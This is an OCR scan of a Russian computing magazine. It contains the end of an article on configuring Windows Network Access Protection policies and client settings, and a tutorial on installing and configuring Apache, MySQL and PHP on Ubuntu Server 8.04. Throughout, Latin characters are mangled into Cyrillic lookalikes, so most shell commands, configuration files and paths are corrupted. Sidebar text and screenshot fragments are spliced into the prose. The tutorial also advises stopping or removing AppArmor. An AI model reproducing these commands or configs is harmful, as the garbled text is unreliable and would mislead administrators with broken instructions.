ление клиентских компьютеров» (ЕпаЫе аиіо-гетесііаііоп о!" 
сііепі: сотриіегз] разрешает получение обновлений клиент- 
ским системам, неудовлетворяющим политикам. Если этот 
параметр не выбран, клиенты, не поддерживающие ЫАР, не 
обновятся автоматически и не смогут получить полный до- 
ступ, пока не будут обновлены вручную. Переключатель вни- 
зу позволяет выбрать ограничения доступа к Сети клиентам, 
не поддерживающим ЫАР. По умолчанию разрешен только 
ограниченный доступ репу би II пеіѵѵогк ассезз ...]. Если по 
какой-то причине для таких систем ограничений не предус- 
мотрено, то переключаем в полный доступ (АНоѵѵ би II пеіѵѵогк 
ассезз...]. После нажатия кнопки «Далее» создаются полити- 
ки и выводится отчет. 

ЗНАКОМСТВО С КОНСОЛЬЮ ЫР5 

Более тонко политики задаются в отдельных меню. Так, в 
«ВА0ІІІ5 Вегѵег и Сііепбз» настраиваются клиенты и удален- 
ные группы серверов РАБНИВ (Петоіе РАБІІІЗЗегѵегбгоирз]. 
Есл и узел ЫР5 будет настроен какРАБІ115прокси,тонаудален- 
ные сервера будут пересылаться запросы на подключение. 

В меню «Пол итики»(РоІісіез]указываются политики запросов 
на подключение (Соппесііоп Редиезі Роіісіез, СРР], сетевые 
политики (Ыеіѵѵогк Роіісіез] и политики работоспособности 



(Неаіббі Роіісіез]. В СРР-политиках определяется обработчик 
запроса при подключении клиента. Это может быть как ло- 
кальный узел, так и удаленный (в случае с РАБ 1115]. Та к как ра- 
нее мы уже создали политики, используя шаблон, то в списке 
присутствуютдвезаписи: ЫАРБНСРи проверка подлинности 
ѴѴіпсІоѵѵз. Чтобы добавить новую политику, нужно в контекс- 
тном меню выбрать пункт «Новый документ». После чего 
следовать указаниям мастера. В колонке «Статус» показано, 
активна эта политика или нет, а цифра в соседней колонке 
указывает на порядок ее обработки. Для изменения полити- 
ки следует дважды щелкнуть по имени. В появившемся окне 
свойств — три вкладки. На вкладке «Обзор» (Оѵегѵіеѵѵ] можно 
изменить имя политики; сняв флажок «Политика включена» 
(Роіісу епаЫесІ], отключить проверку этой политики сервером. 
Раскрывающийся список чуть ниже позволяет изменить тип 
ЫР5-сервера (сейчас установлен ОНСР-сервер]. Активная 
политика будет применяться без каких-либо ограничений. 
Во вкладке «Условия» (Сопсіібіопз] задаются различные 
ограничения для выбранной политики: по времени, ІР-ад- 
ресу, группе НСАР, по имени пользователя, протоколу, типу 
службы и туннеля и т.д. В том числе, предусмотрены и такие, 
как разработчик оборудования РА0ІЕІ5. Все это позволяет 
задать действительно гибкие правила, правда, тут придется 
немного потрудиться. И, наконец, в третьей вкладке «Пара- 
метры» (ЗеШпдз] настраиваются параметры для политики 
Сети, которые будут применены после проверки всех огра- 
ничений. Большинство основных параметров ЫАР находятся 
в «Ыеіѵѵогк Роіісіез». Различают два типа политик: разре- 
шающая и запрещающая. После использования шаблона в 
списке уже будут присутствовать пять политик, определяю- 
щих, кому и на какихусловиях будет разрешен или запрещен 
доступ. При выборе политики в окнах внизу будут показаны 
условия и параметры. При необходимости их можно отредак- 
тировать, вызвав мастера двойным щелчком. Новая политика 
создается аналогично предыдущему пункту (выбор «Новый 
документ» в контекстном меню]. Обратимся к свойствам по- 
литики. Сразу обращаем внимание, что теперь вкладок четыре: 
добавилась «Ограничения» (Сопзігаіпіз]. А содержимое других 
вкладокчутьизменилось. На вкладке«0бзор»указывается, раз- 
решить или запретить доступ в Сеть клиентам, удовлетворяю- 
щимтребованиямэтой политики. Установленный поумолчанию 
флажок«Ідпоге изегассоипі біаі-іп ргорегііез» позволяет игно- 
рировать свойства удаленного доступа учетной записи пользо- 
вателя, если запрос на подключение удовлетворяет политикам. 
Настройка методов проверки подлинности перекочевала в «Ог- 



► 118 



ХАКЕР 12 / 120 / 08 




1 




раничения». Здесь же указываются тайм-аут простоя и сеанса, 
ограничения по времени, тип порта ЧА5 и некоторые другие. 
Соответственно, несколько изменилось содержимое вкладки 
«Параметры». В ней настраиваются ІР-фильтры (позволяющие 
определить, какие пакеты обрабатывать этим интерфейсом], 
шифрование, дополнительные атрибуты ПА0ІІІ5, обработка 
многоканальных подключений. Политика назначения клиен- 
ту ІР-адреса определяется в подпункте «ІР Зеіііпд». Выбрав 
«Принудительное использование ЧАР» (ЧАР Епіогсетепі], мы 
настраиваем уровень применения правил ЫАР Это может быть 
полный доступ к Сети, полныйдоступ вограниченноевремя (ис- 
пытательный срок] и ограниченный доступ. 

Наличие разрешающих политик и настроек может немного 
запутать. На этапе подготовки нужно четко определиться с 
задачами и представлять конечный результат, чтобы не ак- 
тивировать ничего лишнего. Так, параметры сетевой поли- 
тики для «правильных» клиентов должны разрешать полный 
доступ, автообновление должно быть выключено. Для нару- 
шителей, наоборот — ограниченный доступ и активируем ав- 
тообновление. Группа серверов обновлений задается в окне, 
появляющемся при нажатии кнопки«Настроить»(Сопіідиге]. 
За автообновление клиентских компьютеров отвечает фла- 
жок «ЕпаЫе а иіо-гетесііаііоп об сііепі; сотриіегз». 
Конфигурации, необходимые для доступа к Сети ЧАР-сов- 
местимым клиентам, создаются в «Политики работоспособ- 
ности». После использования шаблона здесь две политики: 
«ОНСР Совместимый» и «ОНСР Несовместимый». Вторая 
определяет клиентов, которые не прошли одну или несколь- 
ко 5НѴ- проверок. Непосредственно параметры 5НѴ и группы 
серверовобновлений настраиваются в меню«3ащита досту- 
па к Сети». По умолчанию в ЧР5 присутствует только один 
5НѴ — «Средство проверки работоспособности системы 
безопасности ѴѴіпсІоѵѵз» (ѴѴіпсІоѵѵз Зесигііу Неаііб Ѵаіібаіог]. 
Двойным щелчком вызываем окно свойств, в котором пред- 
ставлены способы разрешения кода ошибки в различных 
ситуациях (ЗНѴ не может связаться со службами или не отве- 
чает, 5НА не отвечает клиенту и т.д.) . По умолчанию при воз- 
никновении любой ошибки клиенту устанавливается статус 
«Несовместимый». Нажав на кнопку «Настроить», получим 
возможность указатьтребования кклиентским компьютерам 
(отдельно ѴѴіпсІоѵѵз ХР и Ѵізіа): 

• должен ли быть включен ѴѴіпсІоѵѵз Еігеѵѵаіі (или другой сов- 
местимый брандмауэр); 

• должна ли быть включена антивирусная программа и на- 
сколько актуальна ее версия; 

• работает ли ѴѴіпсІоѵѵз Оеіепсіег или другое антишпионское 
ПО и насколько оно актуально (только для Ѵізіа]; 
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Выбираем роль для установки 



• включено ли автоматическое обновление; 

• установлены ли обновления безопасности с заданным 
уровнем, с указанием времени последней проверки наличия 
обновлений. 

Последнее меню — «Учетные данные» (Ассоипііпд] — от- 
вечает за настройки журналирования событий І\ІР5. Для 
хранения журналов можно использовать локальный файл 
или базу 5СИ-сервера (в том числе и удаленного]. При ис- 
пользовании локального хранилища события будут отобра- 
жаться в Еѵепі Ѵіеѵѵег. 

НАСТРОЙКА КЛИЕНТА ЫАР 




Настройка ЧАР-клиента производится при помощи 
ММС консоли «Конфигурация клиента ЫАР» (ЫАР Сііепі 
Сопіідигаііоп), доступной в совместимых версиях ОС. По 
умолчанию она не выводится в списке, поэтому ее необходи- 
мо добавить самостоятельно. Запускаем ттсиз командной 
строки и добавляем новую оснастку «Кон соль» — «Добавить 
или удалить оснастку». Выбираем в списке «Конфигурация 
клиента ЫАР» и нажимаем кнопку «Добавить». 

В появившемся окне отмечаем компьютер, на котором будет 
выполняться оснастка (обычно это локальная система]. Пос- 
ле нажатия на «ОК» в окне ММС появляется новая консоль, 
в корне которой предложено три настройки: клиент системы 
ограничений (Епіогсетепі Сііепі), параметры интерфейса 
пользователя (ІІзегІпіегіасеЗеіііпдз) и параметры регистра- 
ции работоспособности (Неаііб Роіісіез). Список поддержи- 
ваемых механизмов ЫАР доступен в «Епіогсетепі; Сііепі» 
(по умолчанию все отключены]. Например, для активации 
механизма ЭНСР выделяем «Клиент принудительного ка- 
рантина для ОНСР» (ОНСР Оиагапііпе Епіогсетепі; Сііепі] и 
нажимаем «Включить». Пункт «Эзег Іпіегіасе Зеіііпд» поз- 
воляет задать рисунок значка ІЧАР-клиента и поясняющий 
текст. Если компьютеров много, то ручная настройка клиентов 
займет много времени. В этом случае следует использовать 
групповые политики, которые расположены вузле Конфигура- 
ция компьютера/Установки ѴѴіпбоѵѵз/Настройки безопаснос- 
ти/Защита доступа к Сети (Сотриіег Сопіідигаііоп/ѴѴіпбоѵѵз 
Зеіііпд/ЗесигііуЗеіііпд/ЧеіѵѵогкАссезз Ргоіесііоп]. 



> ІПІО 

• ЫАР — новая 
технология защиты 
сетевого доступа. ІЧР5 
— сервер сетевых 
политик. 

• Настройка ЧАР- 
клиента производится 
при помощи ММС кон- 
соли «Конфигурация 
клиента ЧАР» (ЧАР 
Сііепі Сопіідигаііоп). 



ЗАКЛЮЧЕНИЕ 

Новая технология Чеіѵѵогк Ассезз Ргоіесііоп позволяет по- 
высить безопасность Сети, блокировав или ограничив до- 
ступ незащищенным клиентским компьютерам. Особенно 
этоактуальнодляудаленныхсистем, какправило, неподкон- 
трольныхадминистраторуи служащихосновным источником 
неприятностей. □С 
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ПОШАГОВОЕ РУКОВОДСТВО ПО УСТАНОВКЕ І.АМР-СЕРВЕРА 

У СЕЮ/Ьших преимуществ много, но именно возможность мгновенного пре- 
образования бюджетного компа в полнофункциональный ѴѴеЪ-сервер позво- 
лила этой операционке ворваться в домашние сети и на корпоративный ры- 
нок. Если ты планируешь развернуть ѵѵеЪ-сервис на базе архитектуры ЬАМР 
в интранет/интернет, то эта статья точно для тебя. 



УСТАНОВКА ЦВ1ЖТЦ 5ЕРѴЕК ЕОІТІОЫ 

За аббревиатурой БАМ Р скрывается конфигурация Біпих, Арасбе, МуЗОБ, 
РНР/РегІ/Руібоп (плюс, сюда часто добавляют РиЬу Оп Райз). В статье ос- 
тановим свой выбор на ІІЬипІи Зегѵег Ебіііоп 8.04.1 БТ5. Почему именно 
он? Причин несколько. Во-первых, ІІЬипІи — один из самых дружелюб- 
ных дистрибутивов, и начинающему администратору с ним будет легче 
разобраться. Во-вторых, быстрота развертывания: весь процесс займет 
примерно 30 минут вместе с установкой сервера. В-третьих, ядро СЬипІи 
Зегѵег Ебйіоп (версии 2.6.24] специально оптимизировано для работы на 
сервере за счет использования: 

• Тіскіезз (этот режим приводит кумен ьшен и ю энергопотребления и теп- 
ловыделения]; 

• N 0 Ргеетрйоп (время отклика для интерактивных задач не уменьша- 
ется); 

• ОеасШпе 1/0 (планировщик, минимизирующий задержки ввода/вывода 
и обеспечивающий поведение, близкое к реальному времени]; 

• РАЕ (поддержка аппаратной технологии, с помощью которой програм- 
мы на 32-разрядных серверах с процессорами ІА-32 могут адресовать 
физическую памятьсвыше4 Гб]; 

• ЮОНг (таймерное прерывание]. 



Крометого, поддержка БТЗ-версии заявлена на пятьлет (до апреля 2013], 
а значит, все это время разработчики обязуются выпускать обновления. 
Такой увеличенный период технической поддержки полностью отвечает 
требованиям современного бизнеса. 

Большая часть сказанного будет действительна для Бебіап и некоторых 
других дистрибутивов, использующих АРТ. Сервер будем ставить в такой 
конфигурации: 

• Арасбе 2 — веб-сервер; 

• МуЗОБ 5 — сервер баз данных; 

• РНР5-РНРСѲІ. 

Процесс установки системы происходит в псевдографической среде. Труд- 
ностей он обычно не вызывает, поэтому по этапам пробежимся лишьповерх- 
ностно. Чтобы всесообщения системы выводилисьна русском языке, взагру- 
зочном меню нажимаем <Р2>. После выбора региона и установки раскладки 
клавиатуры будет произведена автоматическая настройка Сети с помощью 
ОНСР. Если такого сервера нет, выбираем пункт «Настроить сеть вручную» 
и последовательно вводим параметры: ІР-адрес, маску подсети, ІР-адрес 
шлюза, адреса ОЫЗ-серверов (через пробел], имя компьютера и домена. Да- 
лее выбираем в списке часовой пояс, и наступает самый важный этап — раз- 
метка диска. Мастер предлагаетчетыре варианта: автоматическая разметка, 
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Файловый менеджер МібпідЫ: Соттапсіег— незаменимый помощник 
начинающего админа 



І_ѴМ (обычный и шифрованный] и ручной труд. Каждый имеет свои плюсы и 
минусы; если есть сомнения, здесь же доступна справка, которая поможет 
тебе определиться с выбором. При автоматической разметке скриптсоздает 
зѵѵар- раздел, равный 1.5 объема ОЗУ (с конца диска]. Все остальное место 
форматируется какехЕЗ и монтируется как корневой раздел. Что ж, новичкам 
такая схема вполне подойдет. При ручной разметке для размещения журна- 
лов событий, файлов БД и данных веб-сервера лучше создать отдельные раз- 
делы /ѵаг/іод, /ѵаг/шузді и /ѵаг/тлллм, отформатированные в ПеізегЕЭ. 
Эта файловая система обеспечивает улучшенную производительность при 
работе с большим количеством маленьких файлов. Кстати, в II ЬипШ есть одна 
особенность: каталог /ѵаг/гип обязательно должен быть расположен в 
корневой файловой системе, иначе некоторые сервисы просто не смогут за- 
грузиться. Если планируется разрешитьпользователям создавать публичные 
веб-папки (об этом чуть ниже], то имеет смысл назначить раздел для /боте. 
Под корень достаточно отвести 3-4 Гб. Затрудняешься определить, сколько 
требуется места под каждый раздел? Тогда стоит присмотреться к менеджеру 
логическихтомов ЕѴМ. После установки базовой системы создаем учетную 
запись пользователя, который будет одновременно и суперпользователем 
(через зисіо]. Мастер установки предлагает семь готовых конфигураций 
сервера: Б N5, ГАМР, Маіі, ОрепЗЗН, Роз^дгеЗСИ, РгіпіиЭатЬа. После вы- 
бора любого варианта на выходе получаем готовое решение. Но это пред- 
ложение для новичков, а чтобы полностью контролировать процесс, луч- 
ше все компоненты установить самостоятельно. Тем более, в репозитарии 
дистрибутива, какправило, находятся пакеты посвежее, и при обновлении 
дистрибутива все равно эти файлы придется качать. Если дальнейшую 
настройку планируется производить удаленно, ставим только «ОрепЗЗН 
зегѵег». Остальные действия скрипт произведетуже без нашего участия. 
Спустя некоторое время получим сообщение о том, что установка сервера 
успешнозавершена. 

НАСТРОЙКА СЕРВЕРА 

Один из сетевых интерфейсов уже настроен во время установки. Если 
сервер имеет несколько сетевых карт, их необходимо сконфигурировать 
вручную. Открываем файл /еСс/пеЦ\лгогк/іпСег1асез и правим: 

$ зисіо папо -ѵѵ/еіс/пеіѵѵогк/іпіегіасез 

аиСо Іо 

Пасе Іо іпеС ІоорЬаск 

# Интерфейс еСЪ.0 настраивается автоматически посредством 

БСНР 

аиСо еЫзО 

Пасе еСЬ.0 іпеС сПзср 

# Параметры еСЫ указываем самостоятельно 



аиСо еСЬ.1 

Пасе еЫз 1 іпеС зСаСіс 

асісігезз 192.168.0.200 
пеСтазк 255.255.255.0 
пеСхѵогк 192 . 168 .0.0 
ЪгоасісазС 192.168.0.255 
дакеадау 192 .168.0.1 

Перезапускаем Сеть: 

$ зисіо /екс/іпік . сі/пеіѵтогкіпд гезкагк 

Теперь в /екс/козкз прописываем соответствие имени узла и ІР-адре- 
са. Например: 

$ зисіо папо /еіс/ИозІз 

192 .168 .0.200 отеЪ. зегѵег. сот ѵ/еЬ 

Аналогично добавляем записи и для остальных узлов (втом числе и вир- 
туальных], с которыми будем «общаться». 

После установки системы в /екс/Ьозкпате должно быть прописано 
имя узла. Если вывод команды «Ьозіпате» не соответствует должному, 
редактируем этот файл. 

Установку пакетов будем производить из сетевого репозитария, поэтому 
в файле /екс/арк/зоигсез . Іізк строка «сіеЪ ссігот: [Шэипки- 
Зегѵег 8.04 _Нагс1у Негоп_ — Кеіеазе І386 (20080701)]/ 

Ьагсіу таіп гезСгісСесі» должна быть закомментирована. Так как мы 
не планируем ничего самостоятельно компилировать, то комментируем и 
строки, начинающиеся с«беЬ-5гс». Остальное оставляем, какесть. 

В некоторых случаях АррАгтог (программный инструментупреждающей 
защиты, основанный на политиках безопасности, подробности ищи в 
статье «Бронированный туке» в □Е_08_2007) слишком рьяно выполняет 
свои обязанности. Например, приустановке іврСР (смотри статью«Неза- 
менимый помощникхостера» вЗС_10_2008) АррАгтог напрочь блокиро- 
вал работу сервисов. При построении защищенного ѴѴеЬ-сервера можно 
обойтись и без него. Поэтому если обнаружится какая-то проблема, оста- 
навливаем работу профилей безопасности: 

$ зисіо /еСс/іпіС . сі/аррагшог зСор 

Если после этого проблема решена, отключаем автозагрузку АррАгтог или 
совсем его удаляем: 

$ зисіо ирсіаСе-гс . сі -1 аррагтог гетоѵе 
$ зисіо арС-деС гетоѵе аррагтог аррагтог-иСіІз 
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Установка веб-сервера АрасЬе довольно проста: 

$ зисіо арО-дек іпзкаіі арас]те2 

Теперь настала очередь РНР5. Не забываем модуль для ра- 
боты С МуСКуЛОМ: 

$ зисіо арД-деО іпзОаІІ рТірБ 1іЬарасЬе2-тос1-р]тр5 
рИрБ-туздІ 

Зависимости и остальные компоненты арі-деі подхватывает 
самостоятельно. В большинстве случаевтого, что есть, — до- 
статочно. Хотя некоторые модули веб-сервера поумолчанию 
не подключаются. Список всех доступных модулей можно 
получить, введя: 

$ зисіо а2епшосі 

Как вариант, просто смотрим листинг каталога /еДс/ 
арасЬе2/шосіз-аѵаі1аЫе. Чтобы сделать активным лю- 
бой из модулей, следует создать символическую ссылку в 
подкаталог /еДс/арас]те2 /шосіз-епаЫесі(что, собствен- 
но, и делает команда а2ептоб]. Давай посмотрим, что собой 
представляют файлы, отвечающие за поддержку РНР: 

$саі/е(с/арасНе2/тос]5-аѵаіІаЫе/рНр5.соггі 

<ІШоби1е тосЩркрБ . о 

АсісіТуре аррІісаДіоп/х-ЬДОрсі-рІір . ркр .рЫстІ 
. рЪрЗ 

АсісіТуре аррІісаОіоп/х-ІіООрсі-рІір-зоигсе . ркрз 
</ІШосіи1е> 

$саІ/еІс/арасНе2/тосІ5-аѵаіІаЫе/рІір5.1оасІ 

ЬоабМосІиІе ріір5_тосіи1е /изг/1іЪ/арасЪ.е2 / 
тосіиІез/ІіЬрІтрБ . зо 

Если используется другой дистрибутив, или связка АрасЬе + 
РНР5 собиралась вручную, обязательно проследи, чтобы в / 
еДс/арас1іе2/]тДДрсі. сопі (арас1іе2 . сопі] присутство- 
вали эти строки. Модуль для работы РНРуже активирован: 

$ зисіо а2епшосі ркрБ 

Ткіз тосіиіе аігеасіу епаЫесі. 



Для некоторых задач могут потребоваться дополнительные 
модули РНР (список пакетов рЬрБ-*, доступных в репози- 
тарии, можно получить, введя «зисіо арк-саске зеагсЪ. 
рЬрБ»): 

$ зисіо арД-деД іпзДаІІ ркрБ-дсІ ркрБ-ішадіск 
ркрБ-рзреІІ ркрБ-гесосіе рЬрБ-хшІгрс ркрб-хзі 
ркрБ-тсгурк ркрБ-тетсаске ркрБ-сигІ ркр-реаг 
ркрБ-ітар ркрБ-зптр 

Перезапускаем веб-сервер: 

$ зисіо /еДс/іпіД . сі/арас]ге2 геіоасі 




> Ипкз 

• Основные пара- 
метры и модули 
АрасЬе расписаны в 
документации веб- 
сервера: ЬкрсіарасЬе 
огд/босз/2.2 . 



Набираем в браузере строку ккДр: //Іосаікозк, — в ответ мы 
должныувидетьнадпись«ш ѵгогкз ! ». Чтобы проверить работу 
РНР, создаем файл кезк .ркр и пробуем к нему обратиться: 

$ зисіо еско ' <?ркріпіо ( ) ?> ' > 

/ѵаг/ілплм/кезк .ркр 

$ Іупх кккр : //Іосаікозк/кезк .ркр 

В ответ должны получить таблицу с настройками РНР. Если 
это не так, следует просмотреть журналы веб-сервера, рас- 
положенные в каталоге /ѵаг/1од/араске2. В них обычно 
выдаются информативные подсказки. 

При первом запуске веб-сервера в консоли выводится со- 
общение о том, что индеец не может определить доменное 
имя данного хоста: «араске2 : Соиісі пок геІіаЫу 

сіекегшіпе Дке зегѵег 'з іиііу диаііііесі сіошаіп 
паше, изіпд 127.0.1.1 іог ЗегѵегЫаше». Чтобы 
его убрать, установи значение переменной ЗегѵегЫате в 
араске2 . сопі. Хотя в 1)Ьип1:и эта настройка вынесена в от- 
дельный файл /екс/араске2 /сопі . сі/ідсіп. 



• Скачать ІІЬипіи 
8.04.1 ИЗ Зегѵег 
Ебіііоп можно по 
ссылке на странице 

уууууу.иЬипЩ.сот/ 

деІиЬипІи/боѵѵпІоаб. 

• Диски ІІЬипШ 
высылаются по почте 
всем желающим. Для 
заказа зарегистри- 
руйся на странице 
бНрзѴ/зЫріі.иЬипіи. 
сот. 



$ зисіо папо еІс/арасИе2/соггі.сіЛрс1п 

ЗегѵегЫате ѵлеЪ . зегѵег . сот 



Поддержка МуЗСИ в РНР обеспечивается наличием в ка- 
талоге /е1;с/рЬр5/арасЬе2/сопЕсІ файлов тузцЫпі и тузцО. 
іпі. Каждый состоит всего из одной строки. В тузцЫпі со- 
держится запись «ех1:еп5Іоп=тузд1 . зо», а в шуздіі . іпі 
— «ехкепзіоп=шузд1і . зо». Если эти файлы в твоем дис- 
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Настраиваем сетевые интерфейсы 




> СІѴСІ 

На прилагаемом к 
журналудискеты 
найдешь весь софт, 
упоминаемый в статье, 
а также видеоролик, 
где показано, как 
развернуть архитекту- 
ру І_АМР. 



Обновляем список пакетов и затем — полностью — систему: 

$ зисіо арС-деС ирсІаСе 
$ зисіо арС-деС ирдгасіе 

Если 55Н -сервер во время инсталляции системы неуста на вли- 
вался, делаем это сейчас. Заодно установим пакет «пір», кото- 
рый обеспечит нам автоматическую синхронизацию времени: 

$ зисіо арС-деС іпзСаІІ орепззЪ-зегѵег пСр 
пСрсіаСе 

Новичкам для правки файлов и навигации, возможно, удобнее 
будет использовать файловый менеджер МібпідЫСоттапсІег: 

$ зисіо арС-деС іпзСаІІ тс сопзоіе-сугііііс 

Теперь достаточно набрать «тс», и появится окно удобного файло- 
вого менеджера, подобного старому доброму Нортону. Второй пакет 
необходим для локализации консоли, — иначе сообщения, выводи- 
мые на русском, будут нечитаемы. В 8.04.1 ссылка для автоматичес- 
кой загрузки сопзоіе-сугііііс отсутствует, поэтому нужно каждый раз 
запускатьего вручную, либо переконфигурировать пакет. Вводим: 



В процессе установки должен появиться запрос на ввод пароля ад- 
министратора базы данных. Если этого не произошло, устанавлива- 
ем пасс самостоятельно: 

$ зисіо туздіасішіп -и гооС раззѵтогсі пароль 

Пробуем подключиться к базе данных и получить список таб- 
лиц: 

$ тузді -и гооС -р 

Шеісоте Со Ызе МуЗОЬ топіСог. Соттапсіз епсі міСЪ. 
; ог \д . 

Уоиг МуЗОЬ соппесСіоп ісі із 16 

Зегѵег ѵегзіоп: 5 . О . 51а-ЗиЬипСи5 . 1 (ШшпСи) 

тузд1> изе тузді; 

тузд1> зТюіл СаЫез; 

тузд1> диіС; 

В настройках по умолчанию мускул будет отрабатывать только ло- 
кальные подключения: 

$ саС /еСс / тузді / ту . спі | дгер Ьіпсі-асісігезз 
Ьіпсі-асісігезз = 127.0.0.0 



$ зисіо сіркд-гесопіідиге сопзоіе-сугііііс 



Проверяем, прослушивается ли портЗЗОбЛср: 



Скриптзадаст несколько простых вопросов касательно пере- 
ключателя раскладки, шрифта, кодировки (ІІпісобе) и авто- 
матической установки настроек при старте системы. 

Итак, «И» уже готов к работе, остался «АМР». 

УСТАНОВКА МУСКУЛА, АПАЧА И РНР 

Ставим пакеты для Му5СИ: 

$ зисіо арС-деС іпзСаІІ тузді-зегѵег тузді- 
сІіепС 



$ пеСзСаС — апС I дгер 3306 

Сер 0 0 127.0.0.0:3306 

0 . 0 . 0 . 0 : * ЫЗТЕЫ 

Изсоображений безопасности этотпортможноотключитьи исполь- 
зовать локальный сокет тузді.зоск. Для этого добавим в секцию 
[туздіеі] файла /еіе/тузді/ту.епі директиву «зкір-пеіѵѵогкіпд» и 
перезапустим сервер: 

$ зисіо /екс/іпік . сі/тузді гезкагк 
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Основные конфигурационные 
файлы ЬАМР в ЦЬшіШ 



/еііс/пеГѵѵогк/іпііегГасез — настройка сетевых интерфейсов 
/еііс/ііозтате — сетевое имя узла 
/еІс/Ьо8І8 — соответствие имени и ІР (локальный ЭМЗ) 
/еііс/гезоІѵ.сопГ — ІР-адресаЭКЗ-серверов 
/еІс/ар1:/8оигсе8.1І8І — используемые АРТ-репозитарии пакетов 
/еіс /ту 8д1 /ту. сгй — настройка МуЗС^Ь 



/е1;с/арасЬе2 — каталог с конфигурационными файлами веб-сервера 
/еіс /арасЬе2 /арасЬе2 .сопГ — основной файл настройки Арасйе 
/е1;с/арас1іе2 /согѵіЛ/іцбгѵ — имя (ЗегѵегКате) веб-сервера по дефолту 
/е1;с/арасЬе2/епѵѵаг8 — основные переменные Арасйе 
/еі;с/арасЬе2/8Іі;е8-аѵаі1аЫе/(1е^аи1і; — сайт по-умолчанию 
/е1:с/рЬр5 — файлы настроек РНР5 




> ІП^О 

• Ядро ІІЬигйи Зегѵег 
ЕсПбоп специально 
оптимизировано для 
работы на сервере 
за счетТіскІезв, N 0 
Ргеетрііоп, РеасШпе 
1/0, РАЕ и 1 0ОНг. 

• 0 повышении 
безопасности веб- 
сервера читай в статье 
«Возьми индейца под 
защиту», опублико- 
ванной в ~5Г~ 10 2007. 



трибутиве отсутствуют — не беда. Просто сними соответству- 
ющие комментарии в рйр.іпі: 

$5исІопапо/еіс/рЬр5/арасЬе2/рЬр.іпі 

; Максимальный размер загружаемого файла. 
Вспомни о нем, когда МогбРгезз откажется по- 
нимать файл большего размера . 
ир1оаб_шах_бі1езІ2е = 6М 
; Подключение модулей для работы с МуЗОБ 
; ехСепзіоп=тузд1 . зо 
; ехбепзіоп=тузд1і . зо 

; Безопасный режим запрещает скриптам произ- 
водить любые действия, которые являются небе- 
зопасными для МеЪ-сервера (будь внимателен, 
не все СМ3 его любят) 
забе_тобе=оп 

; Перечень функций, использование которых за- 
прещено в пользовательских скриптах 
бізаЫе_бипсСіопз=зузСеш, ехес 

Вообще, параметров в рПр.іпі довольно много. Советую 
уделить время их изучению. 

НАСТРОЙКА ВИРТУАЛЬНЫХ ХОСТОВ 

Веб-сервер АрасЬе разрешает использовать несколько 
вариантов выделения пользователям места под собс- 
твенный веб-сайт. Самый простой — это подкаталог в кор- 
не веб-сервера. Например, создаем каталог /ѵаг/вдш/ 
зібеі. Теперь к нему можно обратиться как ПССр:// 
ІосаІПозС/зіСеІ. Но это не всегда удобно, ведь каж- 
дый сайт обычно имеет свое уникальное доменное имя. 
Еще один вариант — разрешить пользователям, имею- 
щим учетные записи в системе, самостоятельно созда- 
вать веб- ресурсы. Активировать та кую функциональность 
можно при помощи параметра бзегБіг. Вариантов тут, 
как обычно, несколько — чаще всего под веб-сервис ис- 
пользуют подкаталог риЫіс_Пбш1 в домашней дирек- 
тории пользователя. Заносим в арасПе2 . сопб строку: 

БзегБіг риЫіс_Пбт1 

И подгружаем модуль изегбіг: 



тоби1ез/тоб_изегбіг . зо 

сІШобиІе тоб_изегбіг . о 
ІІзегБіг риЫіс_Пбш1 
ІІзегБіг бізаЫеб гооб 

<Бігесбогу /Поте/*/риЫіс_Нбт1> 

АІІоілЮѵеггібе РіІеІпПо АибПСопііід Ьітіб 
Орбіопз МиІбіѴіемз Іпбехез ЗутЬіпкзІі: \ 
ОѵтегМабсЪ. ІпсІибезБоЕхес 
</Бігесбогу> 

</ІШоби1е> 

Теперь любому пользователю достаточно создать в сво- 
ем домашнем каталоге поддиректорию риЫіс_ПСш1 
(ткбіг -ш 755 ~/риЫіс_ПСші], и его содержимое будет 
доступно по адресу кедр : //1оса1Ь.озС/~изег. Адрес 
можно сделать приятнее глазу, немного поэксперименти- 
ровав с БзегБіг (за детальным описанием и примерами 
обращайся к Шрб.арасЬе.огд/бос5/2.2/тосІ/тос1 изегсііг. 
Млпі). И третий, самый популярный вариант — виртуальные 
хосты. В этом случае все узлы, висящие на одном ІР (и од- 
ном АрасЬе], будут иметь свое имя, по которому веб-сервер 
и определит, из какого каталога следует отдавать файл. 
Управление виртуальными хостами в АрасЬе организовано 
аналогия но модул ям, — в/ебс/арас1іе2/зіЦез-аѵаі1аЫе 
помещаем файл с описанием, а командой а2епзі1:е с назва- 
нием файла его включаем. Да, конечно, нам под силу описать 
все узлы в араске2 . сопб, но это не оченьудобно. Просмот- 
рев список ссылок в зібез-епаЫеб, можно быстро узнать, 
сколько сейчас виртуальных серверов активно, и при необ- 
ходимости легко включить или отключить любой из них. 

В зібез-аѵаіІаЫе уже находится файл бебаиіб, кото- 
рый описываетузел поумолчанию. Его можно использовать 
как шаблон (этот же узел будет отвечать, если к серверу об- 
ратиться по ІР-адресу, а не по имени): 

$ зибо ср /ебс/арас1іе2/зіЦез-аѵаі1аЫе/беПаи11і 
/ебс/арасЪ.е2 /зібез-аѵаіІаЫе/зегѵег . сот 

$ зисіо папо /еІс/арасИег/зіІез-аѵаіІаЫе/зегѵег.сот 

ЫатеѴігбиаІНозб зегѵег.сот 



$ зибо а2ептоб изегбіг 

Эта команда соответствует добавлению в араске2 . соп5 
таких строк: 



сѴігбиаІНозб зегѵег.сош> 

ЗегѵегАбтіп меЬтазбегѲзегѵег . сот 
# Каталог виртуального хоста 
БосшпепСКооС /ѵаг/ыыы/ зегѵег . сот 



ЬоабМобиІе изегбіг_тоби!е /изг/1іЬ/арасЬе2 / 



<Бігесбогу /ѵаг/ѵллл/ зегѵег . с от> 
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0 дг!пйег@дгІшіег«ип: и -1 ѲВ6 - 5 №11 #2-Коп5оІе 


„ С X 


Сеанс Правка Вид Закладки настройка Справка 





шуздТ> изе глузді; 

Кеайіпд ІаЬІе іггГогта'ііоп ■Гог сотрІеНоп о’Г іаЫе апсі соіитп патез 
Уои сап 1:игп оТГ ѢИіз Геа'Ьиге *о де* а диіскег з*аг*ир ѵ/і*Гі -А 



ОаІаЬазе сНапдесі 
шузд!> зііем *аЫез; 

+ + 

| ТаЫ.е 5 _іп_туздТ. | 



, I 

I §*| : _*_5ПеІІ _• ЗЬеІІ #3 я ЗЬеІІ # 4 | я зЬеІІ #5 Р ЗЬеІІ #2 | 

ШЯШШШШШШ 



+ + 

| со!итпз_ргіѵ | 

| сІЬ 
| 'Гипс 

I ГіеТ.р_са*едогу 
Ие 1 р_кеуѵ/огс 1 
Ие 1 р_ге 1 а'Гіоп 
\ ГіеТр_*оріс 
Поз* 

| ргос 

